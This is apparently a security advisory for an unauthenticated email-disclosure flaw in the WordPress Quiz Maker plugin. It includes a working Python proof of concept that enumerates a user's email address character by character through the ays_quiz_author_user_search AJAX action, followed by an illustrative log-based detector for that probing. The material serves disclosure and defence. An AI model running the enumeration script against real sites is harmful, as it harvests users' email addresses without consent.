wpexploit | Krzysztof Zając (CERT PL) | WPEX-ID:C62BE802-E91A-4BCF-990D-8FD8EF7C9A28
History: Nov 30, 2023 - 12:00 a.m.

Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure

Tags: quiz maker, unauthenticated, email address disclosure, wp admin ajax

AI Score: 6.9 Medium (Confidence: High)
EPSS: 0.001 Low (Percentile: 31.1%)

Description

The plugin does not adequately authorize the ays_quiz_author_user_search AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses.

import string
import requests

base_url = 'http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&search='
id_to_find = 1
letter_candidates = string.ascii_lowercase + string.digits + '-_.'

email = '@'

# Find letters after @
while True:
    print("current email", email)
    for letter in letter_candidates:
        query = email + letter
        data = requests.get(base_url + query).json()
        if id_to_find in [item['id'] for item in data['results']]:
            email = query
            break
    else:
        break
# Find letters before @
while True:
    print("current email", email)
    for letter in letter_candidates:
        query = letter + email
        data = requests.get(base_url + query).json()
        if id_to_find in [item['id'] for item in data['results']]:
            email = query
            break
    else:
        break
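
A log check for the character-by-character user search described above, added here as an example and not part of the original advisory or the plugin's code: it scans web-server access log lines for a single client sending runs of search values to ays_quiz_author_user_search that differ only in one leading or trailing character. The combined log format, the min_probes threshold, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

ACTION = "ays_quiz_author_user_search"  # AJAX action named in the advisory
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*" \d{3}')

def search_terms_by_client(lines):
    """Map client IP -> ordered `search` values sent to the vulnerable action."""
    terms = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log-format request line
        ip, target = m.groups()
        url = urlsplit(target)
        qs = parse_qs(url.query, keep_blank_values=True)
        if url.path.endswith("/wp-admin/admin-ajax.php") and ACTION in qs.get("action", []):
            terms[ip].append(qs.get("search", [""])[0])
    return terms

def is_one_char_variant(a, b):
    """True when two probes share everything except the first or last character."""
    return len(a) == len(b) > 1 and a != b and (a[:-1] == b[:-1] or a[1:] == b[1:])

def flag_enumeration(lines, min_probes=5):
    """Return {ip: count} of consecutive one-character-variant searches per client."""
    flagged = {}
    for ip, terms in search_terms_by_client(lines).items():
        probes = sum(is_one_char_variant(a, b) for a, b in zip(terms, terms[1:]))
        if probes >= min_probes:  # hypothetical threshold, tune per site
            flagged[ip] = probes
    return flagged

# Constructed sample log lines (documentation IP ranges), not real traffic.
def _line(ip, path):
    return f'{ip} - - [30/Nov/2023:10:00:00 +0000] "GET {path} HTTP/1.1" 200 64 "-" "-"'

AJAX = "/wp-admin/admin-ajax.php?action=" + ACTION + "&search="
SAMPLE_LOG = (
    [_line("203.0.113.7", AJAX + "@" + c) for c in "abcdefg"]    # guesses after '@'
    + [_line("203.0.113.7", AJAX + c + "@g") for c in "abcd"]    # guesses before '@'
    + [_line("198.51.100.4", AJAX + "alice"),                    # one ordinary lookup
       _line("198.51.100.4", "/wp-admin/admin-ajax.php?action=heartbeat")]
)

if __name__ == "__main__":
    print(flag_enumeration(SAMPLE_LOG))
```

Parameters sent in a POST body do not appear in access logs, so this check only sees searches carried in the query string.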
